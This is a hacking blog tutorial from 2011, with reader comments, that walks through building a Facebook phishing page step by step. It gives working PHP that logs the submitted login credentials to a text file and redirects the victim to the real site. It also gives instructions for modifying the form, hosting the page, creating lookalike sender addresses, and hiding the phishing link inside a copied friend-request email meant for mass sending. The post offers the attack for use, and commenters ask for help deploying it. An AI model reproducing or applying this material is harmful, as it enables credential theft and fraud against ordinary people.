Lets Creat Facebook Phisher | Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

Lets Creat Facebook Phisher



I see alot of threads everywhere about facebook. how can i  hackfacebook? why doesnt my phisher work? how can i send my phisher?...


im gonna make a step by step tutorial for facebook accounts...


ONE...
go to "www.facebook.com/login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.


TWO...
Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So press ctrl+f and search "action=" without the quotes. you should find this




The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


THREE...
Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this...
Quote
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this as "next.php"

Note: for security you should rename "passwords.txt" to something else.
now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...


FOUR...
Upload the 3 files  to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...


FIVE...
now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...

SIX...
Copy the content of an original Facebook friendship invitation email and paste it into a new mail DONT SENT YET!
remove the hyperlink from this link:
http:/www.facebook.com/n/?reqs.php
Mark it and push the Add hyperlink button



Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. Thats pretty kewl. Now i belive your ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it...
d




Share your views...

3 Respones to "Lets Creat Facebook Phisher"

Anonymous said...

where do i find athe link to put in the hyperlink box


June 10, 2011 at 4:30 AM
Anonymous said...

I wonder the same. I have use 007sites.com, and uploaded the files.. but then what am I going to do whith them ?


August 22, 2011 at 2:01 PM
Anonymous said...

ok so where do the passwords go??


September 6, 2011 at 3:55 PM

Post a Comment

 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com